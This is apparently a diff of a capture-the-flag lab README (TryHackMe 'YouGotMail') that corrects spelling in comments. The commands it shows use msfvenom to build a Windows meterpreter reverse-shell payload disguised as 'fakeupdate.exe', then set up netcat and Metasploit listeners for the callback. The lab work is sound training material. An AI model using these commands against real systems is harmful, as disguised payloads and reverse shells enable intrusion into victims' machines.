SuperRishi007/CyberSecurityLabs-CTFS/YouGotMail-THM/README.md

 #creating the payload and stating the listner
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.84.253 LPORT=1337 -f exe > fakeupdate.exe

-#listining on the specified port.
+#listening on the specified port.
 nc -nvlp 1337

-#^realised the above will not work, and I need to use msf6 to actually get a resvese shell
+#^realised the above will not work, and I need to use msf6 to actually get a reverse shell

 msf6 exploit(multi/handler) > run
 [*] Started reverse TCP handler on 10.13.84.253:1337